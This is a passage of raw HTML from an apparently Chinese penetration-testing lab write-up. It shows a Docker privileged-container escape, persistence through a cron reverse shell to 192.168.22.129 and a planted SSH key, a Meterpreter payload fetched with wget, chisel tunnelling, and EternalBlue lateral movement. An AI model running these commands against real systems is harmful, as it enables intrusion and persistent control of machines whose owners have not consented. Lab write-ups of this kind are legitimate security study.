class=\"wp-block-paragraph\"><a><\/a>CapEff\u4e3a0000001fffffffff\uff0c\u8bf4\u660e\u5bb9\u5668\u662f\u7279\u6743\u6a21\u5f0f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8bd5\u4e00\u4e0b\u53d1\u73b0\u53ea\u6709tomcat\u7684\u5bb9\u5668\u662f\u7279\u6743\u6a21\u5f0f<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image18.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"764\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image18.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1999\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>lsblk\nmkdir pass\nmount \/dev\/sda1 pass\n\u5728\u6302\u8f7d\u7684\u76d8\u91cc\u5199\u4e00\u4e2a\u53cd\u5f39shell\uff0c\u7136\u540e\u8fd0\u884c<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>echo 'bash -i >&amp; \/dev\/tcp\/192.168.22.129\/4466 0>&amp;1' > \/pass\/pass.shcd passchmod + pass.sh\u5199\u4e00\u4e2a\u5b9a\u65f6\u4efb\u52a1\necho \"* * * * * root bash \/pass.sh\" >> \/pass\/etc\/crontab<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u4e0d\u8981\u76f4\u63a5bash pass.sh\uff0c\u8fd9\u6837\u53ea\u662f\u5728tomcat\u7684webshell\u91cc\u8fd0\u884c\uff0c\u4e0d\u662f\u5728ubutu\u4e3b\u673a\u8fd0\u884c\uff0c\u7ed9ubuntu\u5199\u4e2a\u5b9a\u65f6\u4efb\u52a1\u624d\u4f1a\u53cd\u5f39ubuntu\u7684shell<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image19.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"820\" height=\"178\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image19.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2000\"  sizes=\"auto, (max-width: 820px) 100vw, 820px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u00a0<strong>\u5199 SSH \u516c\u94a5\u767b\u5f55 Ubuntu<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5199\u516c\u94a5\u4e5f\u5f88\u5e38\u7528\uff0c\u4e5f\u6f14\u793a\u4e00\u904d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>cat \/usr\/local\/tomcat\/pass\/etc\/passwd<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image20.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"836\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image20.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2001\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"># 1. \u627e\u53ef\u767b\u5f55\u7528\u6237<br>awk -F: &#8216;$7 ~ \/(bash|sh|zsh)$\/ {print $1, $3, $4, $6, $7}&#8217; \/usr\/local\/tomcat\/pass\/etc\/passwd<br>2. \u770b sshd \u662f\u5426\u9650\u5236\u7528\u6237<br>grep -Ei &#8216;PermitRootLogin|PubkeyAuthentication|AuthorizedKeysFile|AllowUsers|DenyUsers|StrictModes&#8217; \/usr\/local\/tomcat\/pass\/etc\/ssh\/sshd_config<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>\u653b\u51fb\u673a\u751f\u6210\u5bc6\u94a5\uff0c\u5728kali\u4e0a\u6267\u884c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>ssh-keygen -y-f .\/hr4_ubuntu<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"379\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image21.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2002\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><a><\/a>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCaIGesgRnd+5XvzeOgNgyBPhB5ailBWnckDVeFib19pdkf1+ZdvUNazCwXRH6tYhRpAeE5+pubsm8P9CnuxYEJXsKGBbA7qwvXBpzIwhgbT7vn72oozyy26EIvqZNOzBYL537wic\/qOgr2xoerlHPMitOFPqdg6F\/tRb7mSFzEK\/+yGnBRsasvOD8pY\/ovFwfm4FDBnedNH5Qivmf1MFt8laH\/3O6NQfjyzzKpcaRziOvPLFCMMRl838hGv3T4fDkpuhpqnCP\/jpMS+iom3Isr1xMDYIFNfCXpX+vI52qi7RPKKxKIeqyVqazfuSdb5TzSuC8pkM6SBDOEVzPwac5R root@kali<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5728Webshell\u4e2d\u6267\u884c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>mkdir-p \/usr\/local\/tomcat\/pass\/host\/home\/ubuntu\/.ssh<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u7136\u540e\u628a\u516c\u94a5\u5199\u8fdb\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>printf '%s\\n' 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCaIGesgRnd+5XvzeOgNgyBPhB5ailBWnckDVeFib19pdkf1+ZdvUNazCwXRH6tYhRpAeE5+pubsm8P9CnuxYEJXsKGBbA7qwvXBpzIwhgbT7vn72oozyy26EIvqZNOzBYL537wic\/qOgr2xoerlHPMitOFPqdg6F\/tRb7mSFzEK\/+yGnBRsasvOD8pY\/ovFwfm4FDBnedNH5Qivmf1MFt8laH\/3O6NQfjyzzKpcaRziOvPLFCMMRl838hGv3T4fDkpuhpqnCP\/jpMS+iom3Isr1xMDYIFNfCXpX+vI52qi7RPKKxKIeqyVqazfuSdb5TzSuC8pkM6SBDOEVzPwac5R root@kali' &gt; \/usr\/local\/tomcat\/pass\/home\/ubuntu\/.ssh\/authorized_keys<br>\/usr\/local\/tomcat\/pass\u4e3a\u6302\u8f7d\u7684\u76ee\u5f55\uff0c\u6309\u5b9e\u9645\u66ff\u6362\uff0c\u5e38\u7528\/mnt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"149\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2006\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u4fee\u6539\u6743\u9650\u548c\u5c5e\u4e3b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">chown 1000:1000 \/usr\/local\/tomcat\/pass\/home\/ubuntu<br>chown -R 1000:1000 \/usr\/local\/tomcat\/pass\/home\/ubuntu\/.ssh<br>chmod 755 \/usr\/local\/tomcat\/pass\/home\/ubuntu<br>chmod 700 \/usr\/local\/tomcat\/pass\/home\/ubuntu\/.ssh<br>chmod 600 \/usr\/local\/tomcat\/pass\/home\/ubuntu\/.ssh\/authorized_keys<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u9a8c\u8bc1\u662f\u5426\u5199\u5165\u6210\u529f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ls -ld \/usr\/local\/tomcat\/pass\/home\/ubuntu\nls -la \/usr\/local\/tomcat\/pass\/home\/ubuntu\/.ssh\ncat \/usr\/local\/tomcat\/pass\/home\/ubuntu\/.ssh\/authorized_keys<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;1. \u8def\u5f84\u5fc5\u987b\u662f \/mnt\/host\/home\/ubuntu\/.ssh\/authorized_keys2. .ssh \u6743\u9650\uff1adrwx&#8212;&#8212; 3. authorized_keys \u6743\u9650\u662f 6004. \u5c5e\u4e3b\u662f 1000:1000<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"277\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2007\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5728kali\u4e0assh<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssh -i .\/hr4_ubuntu \\\n\u00a0-o IdentitiesOnly=yes \\\n\u00a0-o HostKeyAlgorithms=+ssh-rsa \\\n\u00a0-o PubkeyAcceptedAlgorithms=+ssh-rsa \\\n\u00a0ubuntu@192.168.22.145<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5c31\u53ef\u76f4\u63a5\u8fdb\u5165<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"744\" height=\"377\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2008\"  sizes=\"auto, (max-width: 744px) 100vw, 744px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u5185\u7f51\u6e17\u900f<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>msfvenom -p linux\/x64\/meterpreter\/reverse_tcp \\<br>LHOST=192.168.22.129 \\<br>LPORT=8888 \\<br>-f elf \\<br>-o shell.elf<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u751f\u6210msf\u6728\u9a6c\u6587\u4ef6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>kali\u5f00\u4e00\u4e2ahttp\u670d\u52a1\uff0c\u8ba9ubuntu\u4e0b\u8f7d<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>python -m http.server 66<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728ubuntu\u4e0a\u7528weget\u4e0b\u8f7d<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>weget <a href=\"http:\/\/192.168.22.129:66\/payload.elf\">http:\/\/192.168.22.129:66\/payload.elf<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"232\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2009\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5f00\u542f\u76d1\u542c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>msfconsole<br>use exploit\/multi\/handler<br>set payload linux\/x64\/meterpreter\/reverse_tcp<br>set LHOST 192.168.22.129<br>set LPORT 8888<br>run<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-4.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"234\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-4.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2010\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-5.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"438\" height=\"214\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-5.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2011\"  sizes=\"auto, (max-width: 438px) 100vw, 438px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u6709\u4e00\u4e2a\u65b0\u7f51\u5361\uff0c\u63a8\u6d4b\u662f\u5185\u7f51\u7f51\u5361<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5148\u7528fscan\u626b\u63cf<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>fscan -h 192.168.183.0\/24\uff08fscan -h 192.168.183.0\/24 -np -socks5 127.0.0.1:1080\uff09<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-6.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"484\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-6.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2012\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>183.130\u5f00\u542f\u4e86135,139,445,88<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>183.2\u5f00\u542f\u4e86135,139,445<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>MS17-010\u4f9d\u65e7\u6c38\u6052\u4e4b\u84dd\u6f0f\u6d1e\uff0c\u53ef\u901a\u8fc7smb\u6a2a\u5411\u79fb\u52a8<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u6a2a\u5411\u79fb\u52a8<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5728\u6b64\u4e4b\u524d\u5148\u642d\u4e2a\u4ee3\u7406<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u6539\u7528chisel\u642d\u4e86\uff0cew\u5f88\u591a\u5de5\u5177\u7528\u4e0d\u4e86<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<pre class=\"wp-block-code\"><code><a><\/a>windows\u8fd0\u884c.\\chisel.exe server -v -p 8808 --reverse<\/code><\/pre>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>Proxifier\u914d\u7f6e<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-7.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"550\" height=\"329\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-7.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2013\"  sizes=\"auto, (max-width: 550px) 100vw, 550px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-8.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"582\" height=\"599\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-8.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2014\"  sizes=\"auto, (max-width: 582px) 100vw, 582px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8df3\u677f\u673a\u8fd0\u884c(Windows)<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>chmod +x .\/chisel\n.\/chisel client -v http:\/\/192.168.22.1:8808\u00a0R:1080:socks<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a><a><\/a>kali\u8fd0\u884c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/chisel server -v -p 8808 --reverse\nsudo vim \/etc\/proxychains4.conf<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-9.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"686\" height=\"441\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-9.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2015\"  sizes=\"auto, (max-width: 686px) 100vw, 686px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8df3\u677f\u673a\u6539\u8fde\uff08kali\uff09<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><a><\/a>.\/chisel client -v <a href=\"http:\/\/192.168.22.129:8808\">http:\/\/192.168.22.129:8808<\/a>&nbsp;R:1080:socks<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5982\u679c\u5355\u7eaf\u7528kali\u7684msf\u4e0d\u7528windows\u6216\u5176\u4ed6\u5de5\u5177\uff0c\u90a3\u4e48\u8fd9\u4e2a\u96a7\u9053\u53ef\u6709\u53ef\u65e0\uff0c\u5efa\u4e00\u4e2a\u8def\u7531\u5373\u53ef<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><a><\/a>run autoroute -s 192.168.183.0\/24<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>\u7528\u6c38\u6052\u4e4b\u84dd\u62ff\u4e0d\u4e0bDC\u673a\u53ea\u597d\u5bf9win7\u4e0b\u4e0b\u624b<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><a><\/a>use exploit\/windows\/smb\/ms17_010_eternalblue<br>set payload windows\/x64\/meterpreter\/bind_tcp<br>set rhost 192.168.183.10 #\u4e2d\u95f4NAT\u5730\u5740IP\u4ece129\u53d8\u4e3a10\u4e86<br>set lport 443<br>run<\/p>\n<\/blockquote>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-10.png'><img class=\"lazyload lazyload-style-1\" 